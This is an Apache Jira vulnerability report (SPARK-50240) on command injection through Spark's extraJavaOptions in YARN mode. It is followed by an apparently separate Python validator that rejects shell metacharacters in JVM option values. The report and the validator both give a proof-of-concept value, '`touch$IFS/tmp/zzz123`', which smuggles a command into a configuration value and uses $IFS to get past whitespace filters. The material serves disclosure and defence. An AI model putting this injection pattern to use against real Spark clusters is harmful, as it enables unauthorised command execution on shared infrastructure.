[ https://issues.apache.org/jira/browse/SPARK-50240?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Xiaotong updated SPARK-50240:
-----------------------------
    Description:
We found that Spark allows users to upload a jar package with `extraJavaOptions`.

When instantiating a JAR package, use the javaOption configuration construct to execute the command if you configure the advanced optional parameters:
{color:#808080}spark.executor.extraJavaOption:{color}
{code:java}
\'touch\$IFS/tmp/zzz123|'{code}
The instance executes the jar package, uses the Yarn mode, and injects 'touch /tmp/zzz123' into the bash -c execution command.
Command as:
{code:java}
spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf spark.executor.extraJavaOptions="\`touch\$IFS/tmp/zzz123\`" test.jar {code}
For Java:
{code:java}
sparkLauncher.setConf("spark.executor.extraJavaOptions", "`touch$IFS/tmp/zzz123`"); {code}
Spark execution location:
/yarn/src/main/scala/org/apache/spark/deploy/yarn/ExecutorRunnable.scala

  was:
We found that Spark allows users to upload a jar package with `extraJavaOptions`.

When instantiating a JAR package, use the javaOption configuration construct to execute the command if you configure the advanced optional parameters:
{color:#808080}spark.executor.extraJavaOption:{color}
{code:java}
\'touch\$IFS/tmp/zzz123|'{code}
The instance executes the jar package, uses the Yarn mode, and injects 'touch /tmp/zzz123' into the bash -c execution command.
Command as:
{code:java}
spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf spark.executor.extraJavaOptions="\`touch\$IFS/tmp/zzz123\`" test.jar {code}
For Java:
{code:java}
sparkLauncher.setConf("spark.executor.extraJavaOptions", "`touch$IFS/tmp/zzz123`"); {code}
Spark execution location:
!image-2024-11-12-10-49-35-069.png!
> Command Execution Vulnerability in Spark (JavaOptions)
> ------------------------------------------------------
>
>                 Key: SPARK-50240
>                 URL: https://issues.apache.org/jira/browse/SPARK-50240
>             Project: Spark
>          Issue Type: Bug
>          Components: Spark Submit
>    Affects Versions: 3.5.1
>            Reporter: Xiaotong
>            Priority: Critical
>
> We found that Spark allows users to upload a jar package with `extraJavaOptions`.
>
> When instantiating a JAR package, use the javaOption configuration construct
> to execute the command if you configure the advanced optional parameters:
> {color:#808080}spark.executor.extraJavaOption:{color}
> {code:java}
> \'touch\$IFS/tmp/zzz123|'{code}
> The instance executes the jar package, uses the Yarn mode, and injects 'touch
> /tmp/zzz123' into the bash -c execution command.
> Command as:
> {code:java}
> spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf
> spark.executor.extraJavaOptions="\`touch\$IFS/tmp/zzz123\`" test.jar {code}
> For Java:
> {code:java}
> sparkLauncher.setConf("spark.executor.extraJavaOptions",
> "`touch$IFS/tmp/zzz123`"); {code}
> Spark execution location:
> /yarn/src/main/scala/org/apache/spark/deploy/yarn/ExecutorRunnable.scala

--
This message was sent by Atlassian Jira
(v8.20.10#820010)
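The report above describes a `spark.*.extraJavaOptions` value being carried into a `bash -c` launch command. The following is an added example, not Spark's code and not the reporter's: a validation step that a job-submission wrapper or gateway (a hypothetical component, assumed here) can run over the `--conf` arguments before calling `spark-submit`, rejecting any JVM-option value that contains shell metacharacters or tokens that do not look like JVM flags. The key list, the metacharacter set and the flag pattern are this example's own assumptions.

```python
"""Pre-submit validation of Spark JVM option strings (added example, not Spark code).

A submit wrapper calls is_safe_submit(argv) before handing argv to spark-submit.
Values of the *.extraJavaOptions keys are only accepted if every whitespace-
separated token is shaped like a JVM flag and no shell metacharacter is present.
"""
import re

# Configuration keys whose value is placed on a JVM command line (assumed list).
JVM_OPTION_KEYS = {
    "spark.executor.extraJavaOptions",
    "spark.driver.extraJavaOptions",
    "spark.yarn.am.extraJavaOptions",
}

# Characters that carry meaning for `bash -c` but have no place in a JVM flag.
# `$` also covers $IFS, the whitespace substitute used in the report above.
SHELL_METACHARS = re.compile(r"[`$|;&<>(){}\n\r\\\"']")

# A JVM flag: leading dash, then letters, digits and the punctuation seen in
# -Xmx2g, -XX:+UseG1GC and -Dkey=file:/path/to/value (deliberately strict).
JVM_FLAG = re.compile(r"^-[A-Za-z0-9][A-Za-z0-9_.:=/+,\-]*$")


def validate_java_options(value: str) -> list[str]:
    """Return the individual JVM flags in `value`, or raise ValueError."""
    if SHELL_METACHARS.search(value):
        raise ValueError(f"shell metacharacter in JVM options: {value!r}")
    # Plain split is enough: quotes were already rejected above, so there is
    # no quoting to honour and nothing for a shell-style tokenizer to add.
    tokens = value.split()
    bad = [t for t in tokens if not JVM_FLAG.match(t)]
    if bad:
        raise ValueError(f"token(s) are not JVM flags: {bad}")
    return tokens


def parse_submit_args(argv: list[str]) -> dict[str, str]:
    """Collect --conf key=value pairs from a spark-submit argument vector."""
    conf: dict[str, str] = {}
    args = iter(argv)
    for arg in args:
        if arg == "--conf":
            key, _, val = next(args, "").partition("=")
        elif arg.startswith("--conf="):
            key, _, val = arg[len("--conf="):].partition("=")
        else:
            continue
        conf[key] = val
    return conf


def check_conf(conf: dict[str, str]) -> dict[str, list[str]]:
    """Validate every JVM option key present in a Spark conf mapping."""
    return {k: validate_java_options(v) for k, v in conf.items() if k in JVM_OPTION_KEYS}


def is_safe_submit(argv: list[str]) -> bool:
    """True if every JVM option passed via --conf consists of plain JVM flags."""
    try:
        check_conf(parse_submit_args(argv))
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed sample argument vectors, modelled on the report's command.
    clean = ["--class", "JavaWordCount", "--master", "yarn", "--deploy-mode", "client",
             "--conf", "spark.executor.extraJavaOptions=-Xmx2g -XX:+UseG1GC", "test.jar"]
    tainted = ["--class", "JavaWordCount", "--master", "yarn",
               "--conf", "spark.executor.extraJavaOptions=`touch$IFS/tmp/zzz123`", "test.jar"]
    print("clean accepted:", is_safe_submit(clean))
    print("tainted accepted:", is_safe_submit(tainted))
```

The check is intentionally an allow-list on token shape rather than a deny-list of known payloads: any value that is not recognisably a JVM flag is refused, so the wrapper does not have to anticipate how whitespace or quoting might be encoded. The same `validate_java_options` can be applied to values set programmatically, for example before `SparkLauncher.setConf` is called.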